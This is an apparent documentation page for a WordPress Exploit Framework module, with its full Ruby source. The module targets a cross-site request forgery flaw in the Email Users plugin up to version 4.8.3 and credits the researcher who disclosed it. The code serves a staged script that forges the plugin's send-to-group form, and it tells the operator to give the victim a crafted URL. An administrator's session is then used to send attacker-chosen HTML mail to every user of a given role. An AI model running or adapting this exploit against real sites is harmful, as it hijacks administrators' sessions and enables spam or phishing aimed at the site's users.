class Wpxf::Auxiliary::EmailUsersCsrfBulkMail
Public Class Methods
new()
Calls superclass method
Wpxf::WordPress::StagedReflectedXss::new
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 6
# Registers the module metadata and the three string options this module reads
# back from the datastore: user_role, email_body and email_subject.
def initialize
  super

  module_description =
    'This module exploits a lack of CSRF protection in versions <= 4.8.3 of '\
    'the Email Users plugin, which allows for the sending of a bulk e-mail to '\
    'all users of a specified role.'

  update_info(
    name: 'Email Users <= 4.8.3 CSRF Bulk Mail',
    desc: module_description,
    author: [
      'Julien Rentrop', # Disclosure
      'rastating'       # WPXF module
    ],
    references: [
      %w[WPVDB 8601],
      ['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_vulnerability_in_email_users_wordpress_plugin.html']
    ],
    date: 'Aug 15 2016'
  )

  # user_role is the only option with a default; the other two must be supplied.
  role_option = StringOption.new(
    name: 'user_role',
    desc: 'The role of the users to send the e-mail to',
    default: 'Subscriber',
    required: true
  )
  body_option = StringOption.new(
    name: 'email_body',
    desc: 'The HTML body of the e-mail to send',
    required: true
  )
  subject_option = StringOption.new(
    name: 'email_subject',
    desc: 'The subject of the e-mail to send',
    required: true
  )

  register_options([role_option, body_option, subject_option])
end
Public Instance Methods
check()
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 45
# Checks the version advertised in the plugin readme against 4.8.4, the
# release following the last vulnerable version named in the module title.
def check
  plugin_slug = 'email-users'
  fixed_version = '4.8.4'
  check_plugin_version_from_readme(plugin_slug, fixed_version)
end
initial_script()
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 64
# Builds the body that on_http_request serves as text/html: a basic POST
# script targeting vulnerable_url with the send-to-group form fields, taking
# subject, body and role from the datastore options.
def initial_script
  target_url = vulnerable_url
  target_role = user_role
  subject = datastore['email_subject']
  html_body = datastore['email_body']

  create_basic_post_script(
    target_url,
    'send' => 'true',
    'fromName' => '',
    'fromAddress' => '',
    'group_mode' => 'role',
    'mail_format' => 'html',
    'send_targets[]' => target_role,
    'subject' => subject,
    'mailcontent' => html_body
  )
end
on_http_request(path, _params, _headers)
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 53
# HTTP server callback. Only a request for the staged path (xss_path joined
# with initial_req_path) gets a response; every other path yields an empty
# body. Serving the script also stops the HTTP server, so it is served once.
def on_http_request(path, _params, _headers)
  expected_path = normalize_uri(xss_path, initial_req_path)
  return '' unless path.eql?(expected_path)

  emit_info 'Serving CSRF script to victim...'
  stop_http_server
  { type: 'text/html', body: initial_script }
end
run()
Calls superclass method
Wpxf::WordPress::StagedReflectedXss#run
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 78
# Runs the superclass staging first and returns false if it fails. Otherwise
# prints url_with_xss surrounded by blank lines, starts the HTTP server and
# returns true.
def run
  return false unless super

  emit_info 'Provide the URL below to the victim to send the bulk e-mail'
  # puts with several arguments prints each on its own line; the empty
  # strings give the blank line before and after the URL.
  puts '', url_with_xss, ''
  start_http_server
  true
end
user_role()
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 49
# The send_targets value for the configured role: 'role-' followed by the
# lowercased user_role option (the default 'Subscriber' gives 'role-subscriber').
def user_role
  role_name = datastore['user_role'].downcase
  ['role', role_name].join('-')
end
vulnerable_url()
# File lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb, line 60
# URL of the plugin's send-to-group admin page, built from wordpress_url_admin
# with normalize_uri.
def vulnerable_url
  send_page = 'admin.php?page=mailusers-send-to-group-page'
  normalize_uri(wordpress_url_admin, send_page)
end